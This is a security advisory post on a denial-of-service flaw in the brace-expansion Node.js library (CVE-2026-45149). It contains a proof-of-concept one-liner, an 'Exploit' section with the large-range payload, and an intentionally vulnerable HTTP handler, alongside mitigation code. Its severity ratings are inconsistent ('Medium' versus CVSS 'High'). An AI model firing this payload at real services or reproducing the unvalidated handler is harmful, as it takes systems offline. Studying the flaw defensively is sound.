brace-expansion, Improper Max Option Application, CVE-2026-45149 (Medium) -DC-Jun2026-191

The brace-expansion library, commonly used in Node.js projects to generate arbitrary strings from brace patterns (e.g., `{a..z}` or `{1..100}`), implements a `max` option designed to limit the number of returned elements as a denial-of-service (DoS) safeguard. In versions 5.0.0 through 5.0.5, this protection is applied too late in the expansion process. When processing a single large numeric range such as `{1..10000000}`, the library’s internal sequence generation loop runs its full course—iterating 10 million times—before it checks whether the limit has been reached. Only after building the entire intermediate array does it apply `max` to cap the output.
Consequently, even with a small `max` value (e.g., `max=10`), the expansion unconditionally allocates approximately 505 MB of memory and consumes about 800 milliseconds of CPU time. The `max` check occurs only at the output combination step, which is too late to prevent the resource‑heavy generation. An attacker who can control the input pattern can trigger this behavior repeatedly, leading to memory exhaustion, high CPU consumption, and ultimately a denial of service.
The vulnerability is fixed in version 5.0.6 by moving the `max` verification earlier in the loop, stopping further expansion as soon as the limit is reached. This CVE is assigned CWE-400 (Uncontrolled Resource Consumption) and carries a CVSS 3.1 score of 7.5 (High) with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H.
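To make the difference between the vulnerable and fixed placement of the `max` check concrete, the following is a simplified model written for this post. It is not brace-expansion's own code: both functions expand a single numeric `{from..to}` range and cap the result at `max`, and the only difference is whether the cap is applied after the full sequence is built or inside the generation loop. The `iterations` counter stands in for the CPU and memory cost the advisory describes.

```javascript
// Simplified model of numeric range expansion (added example, not brace-expansion's code).
// Both functions return the same capped output; they differ in how much work they do.

// Late check: the whole sequence is generated first and truncated afterwards.
// Work and allocation scale with the range size no matter how small `max` is.
function expandRangeLateCheck(from, to, max) {
  const step = from <= to ? 1 : -1;
  const seq = [];
  let iterations = 0;
  for (let n = from; step > 0 ? n <= to : n >= to; n += step) {
    seq.push(String(n));
    iterations++;
  }
  return { result: seq.slice(0, max), iterations };
}

// Early check: stop as soon as `max` elements exist.
// Work is bounded by min(max, rangeSize); this is the shape of fix the advisory describes.
function expandRangeEarlyCheck(from, to, max) {
  const step = from <= to ? 1 : -1;
  const seq = [];
  let iterations = 0;
  for (let n = from; step > 0 ? n <= to : n >= to; n += step) {
    if (seq.length >= max) break;
    seq.push(String(n));
    iterations++;
  }
  return { result: seq, iterations };
}

// Run both variants on the same input and report output equality and work done.
function compareWork(from, to, max) {
  const late = expandRangeLateCheck(from, to, max);
  const early = expandRangeEarlyCheck(from, to, max);
  return {
    sameOutput: JSON.stringify(late.result) === JSON.stringify(early.result),
    lateIterations: late.iterations,
    earlyIterations: early.iterations,
  };
}

// Stand-alone run: a 100k-element range capped at 10 costs 100000 vs 10 iterations.
console.log(compareWork(1, 100000, 10));
```

The output is identical in both variants, which is why the defect is easy to miss in functional tests: only the cost differs, and it only shows up when the pattern is large.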

DailyCVE Form:

Platform: brace-expansion
Version: 5.0.0-5.0.5
Vulnerability: max bypass DoS
Severity: Moderate
Date: May 18 2026
Prediction: Patch available now

What Undercode Say:

Check current version
npm list brace-expansion
Update to patched version
npm install brace-expansion@5.0.6
Verify patch
npm list brace-expansion | grep 5.0.6
Proof of concept (Node.js) – vulnerable versions only
node -e "const expand = require('brace-expansion'); console.time('expand'); expand('{1..10000000}', {max:10}); console.timeEnd('expand'); console.log('Memory:', process.memoryUsage().heapUsed / 1024 / 1024, 'MB')"

Exploit:

// Attack payload: large numeric range with max bypass
const expand = require('brace-expansion');
// This call still allocates ~505 MB and takes ~800ms
expand('{1..10000000}', { max: 10 });

// Example HTTP server vulnerable to DoS
const http = require('http');
http.createServer((req, res) => {
  const pattern = req.url.slice(1); // e.g., /{1..10000000}
  expand(pattern, { max: 10 });     // Triggers heavy allocation
  res.end('done');
}).listen(3000);

Protection:

Upgrade to `brace-expansion@5.0.6` or later.

Validate input patterns; reject ranges larger than a safe threshold (e.g., {1..5000}).

Use a wrapper with a timeout for expansion.

Limit the length of the input string.

Apply a process‑level memory limit (e.g., Node.js `--max-old-space-size`).
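The input-validation and input-length mitigations above can be combined into a single pre-check that runs before the library is ever called. The following is an added example for this post, not part of brace-expansion: it estimates how many strings a pattern would expand to (product over brace groups, sum over comma alternatives, sequence length for `{N..M}` / `{N..M..S}` / `{a..z}`) and rejects the pattern when the estimate exceeds a budget or the string is too long. The `5000` budget follows the threshold suggested above; the `256`-character length cap and the function names are assumptions to tune per application.

```javascript
// Pre-validation of brace patterns before calling brace-expansion
// (added example; not the library's own code).

const MAX_EXPANSIONS = 5000;    // budget from the suggested {1..5000} threshold (assumption)
const MAX_PATTERN_LENGTH = 256; // raw input length cap (assumption)

// Split on commas that are not inside nested braces.
function splitTopLevel(s) {
  const parts = [];
  let depth = 0, start = 0;
  for (let i = 0; i < s.length; i++) {
    const c = s[i];
    if (c === '{') depth++;
    else if (c === '}') depth--;
    else if (c === ',' && depth === 0) { parts.push(s.slice(start, i)); start = i + 1; }
  }
  parts.push(s.slice(start));
  return parts;
}

// Element count of a sequence body such as "1..100", "a..z" or "1..100..5".
// Returns null when the body is not a sequence expression.
function sequenceCount(body) {
  const m = /^(-?\d+|[a-zA-Z])\.\.(-?\d+|[a-zA-Z])(?:\.\.(-?\d+))?$/.exec(body);
  if (!m) return null;
  const [, lo, hi, stepStr] = m;
  const isNum = /^-?\d+$/.test(lo) && /^-?\d+$/.test(hi);
  const isAlpha = /^[a-zA-Z]$/.test(lo) && /^[a-zA-Z]$/.test(hi);
  if (!isNum && !isAlpha) return null; // mixed "1..z" is not a sequence
  const a = isNum ? Number(lo) : lo.charCodeAt(0);
  const b = isNum ? Number(hi) : hi.charCodeAt(0);
  const step = stepStr ? (Math.abs(Number(stepStr)) || 1) : 1;
  return Math.floor(Math.abs(b - a) / step) + 1;
}

// Estimated number of strings the pattern expands to. Literal text counts as 1;
// unbalanced braces are treated as literals; nested groups are handled recursively.
function estimateExpansions(pattern) {
  let total = 1;
  let i = 0;
  while (i < pattern.length) {
    if (pattern[i] !== '{') { i++; continue; }
    let depth = 0, j = i;
    for (; j < pattern.length; j++) {
      if (pattern[j] === '{') depth++;
      else if (pattern[j] === '}') { depth--; if (depth === 0) break; }
    }
    if (j >= pattern.length) { i++; continue; } // no matching '}' -> literal brace
    const body = pattern.slice(i + 1, j);
    const seq = sequenceCount(body);
    const groupCount = seq !== null
      ? seq
      : splitTopLevel(body).reduce((sum, alt) => sum + estimateExpansions(alt), 0);
    total *= groupCount;
    if (total > Number.MAX_SAFE_INTEGER) return Infinity;
    i = j + 1;
  }
  return total;
}

// Gate: returns { ok, estimated, reason } for a user-supplied pattern.
function checkPattern(pattern, budget = MAX_EXPANSIONS) {
  if (typeof pattern !== 'string' || pattern.length > MAX_PATTERN_LENGTH) {
    return { ok: false, estimated: null, reason: 'pattern missing or too long' };
  }
  const estimated = estimateExpansions(pattern);
  if (estimated > budget) {
    return { ok: false, estimated, reason: `would expand to ${estimated} strings (budget ${budget})` };
  }
  return { ok: true, estimated, reason: null };
}

// Stand-alone run with constructed inputs: the advisory's payload is rejected, a small pattern passes.
console.log(checkPattern('{1..10000000}'));
console.log(checkPattern('{a,b}{1..3}'));
```

In a request handler the verdict is checked first and the library is called only when `ok` is true, e.g. `if (!checkPattern(input).ok) { res.statusCode = 400; return res.end(); }` before `expand(input, { max: 10 })`. The estimator is deliberately conservative about syntax it does not recognise (it counts unknown groups as one alternative each), so it is a guard on cost, not a replacement for the library's own parsing, and it should sit alongside the upgrade to 5.0.6 rather than instead of it.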

Impact:

Denial of service via memory exhaustion (up to 505 MB per request).

High CPU consumption (≈800 ms per expansion).

Application unresponsiveness or crash under repeated attacks.


Sources:

Reported By: nvd.nist.gov